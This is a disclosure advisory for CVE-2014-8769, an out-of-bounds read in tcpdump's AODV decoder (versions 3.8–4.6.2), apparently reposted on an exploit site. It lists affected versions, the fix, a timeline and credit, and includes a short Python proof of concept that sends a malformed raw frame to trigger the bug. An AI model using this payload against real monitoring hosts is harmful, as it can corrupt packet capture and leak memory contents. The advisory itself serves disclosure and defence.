Home / exploits tcpdump 4.6.2 AOVD Unreliable Output
Posted on 19 November 2014
CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload 1. Background tcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. 2. Summary Information It was found out that malformed network traffic (AOVD-based) can lead to an abnormal behaviour if verbose output of tcpdump monitoring the network is used. 3. Technical Description The application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol fails to perform input validation and performs unsafe out-of-bound accesses. The application will usually not crash, but perform out-of-bounds accesses and output/leak larger amounts of invalid data, which might lead to dropped packets. It is unknown if other payload exists that might trigger segfaults. To reproduce start tcpdump on a network interface sudo tcpdump -i lo -s 0 -n -v (running the program with sudo might hide a possible segfault message on certain environments, see dmesg for details) and use the following python program to generate a frame on the network (might also need sudo): #!/usr/bin/env python from socket import socket, AF_PACKET, SOCK_RAW s = socket(AF_PACKET, SOCK_RAW) s.bind(("lo", 0)) aovd_frame = "x00x00x00x00x00x00x00x00x8cx7axdfx6fx08x00x45x00xe6x3dxf3x7fx40x00x40x11x30xc6x0ax01x01x68x0ax02x02x02x02x8ex0dx00x4bx00x00xe8x12x00x00x00x00x1fxc6x51x35x97x00x24x8cx7axdfx6fx08x00x45x00xe6x3dxf3x7fx40x00x40x11x30xc6x0ax01x01" s.send(aovd_frame) 4. Affected versions Affected versions are 3.8 through 4.6.2 5. Fix The problem is fixed in the upcoming version tcpdump 4.7.0 6. Advisory Timeline 2014-11-08 Discovered 2014-11-09 Requested CVE 2014-11-11 Reported vendor by email 2014-11-12 Vendor made a fix available as repository patch 2014-11-13 CVE number received 2014-11-13 Published CVE advisory 7. Credit The issue was found by Steffen Bauch Twitter: @steffenbauch http://steffenbauch.de using a slightly enhanced version of american fuzzy lop (https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.
